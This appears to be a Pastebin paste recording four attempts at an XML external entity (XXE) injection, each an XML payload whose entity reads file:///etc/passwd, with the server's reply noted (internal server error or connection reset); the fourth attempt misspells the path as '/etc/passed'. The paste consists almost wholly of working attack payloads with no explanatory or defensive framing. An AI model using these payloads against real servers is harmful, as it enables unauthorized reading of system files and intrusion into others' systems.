Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Try 1: generates internal server error:
- <?xml version="1.0" encoding="UTF-8"?>
- <!DOCTYPE foo [
- <!ELEMENT foo ANY>
- <!ENTITY xxe SYSTEM "file:///etc/passwd">
- ]>
- <book>
- <author>&xxe;</author>
- <subject>mypass</subject>
- <content>blah</content>
- </book>
- try2: error returned saying connection was reset:
- <?xml version="1.0" encoding="UTF-8"?>
- <!DOCTYPE foo [
- <!ELEMENT foo ANY>
- <!ENTITY xxe SYSTEM "file:///etc/passwd">
- ]>
- <foo>
- <author>&xxe;</author>
- <subject>mypass</subject>
- <content>blah</content>
- </foo>
- try3: generates internal server error:
- <?xml version="1.0" encoding="UTF-8"?>
- <!DOCTYPE book [
- <!ELEMENT book (author,subject,content)>
- <!ELEMENT author (#PCDATA)>
- <!ELEMENT subject (#PCDATA)>
- <!ELEMENT content (#PCDATA)>
- <!ENTITY xxe SYSTEM "file:///etc/passwd">
- ]>
- <book>
- <author>&xxe;</author>
- <subject>xml</subject>
- <content>exploit</content>
- </book>
- try4: generates a page was reset
- <?xml version="1.0" encoding="UTF-8"?>
- <!DOCTYPE foo [
- <!ELEMENT foo ANY>
- <!ELEMENT author ANY>
- <!ELEMENT subject ANY>
- <!ELEMENT content ANY>
- <!ENTITY xxe SYSTEM "file:///etc/passed">
- ]>
- <foo>
- <author>&xxe;</author>
- <subject>mypass</subject>
- <content>blah</content>
- </foo>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement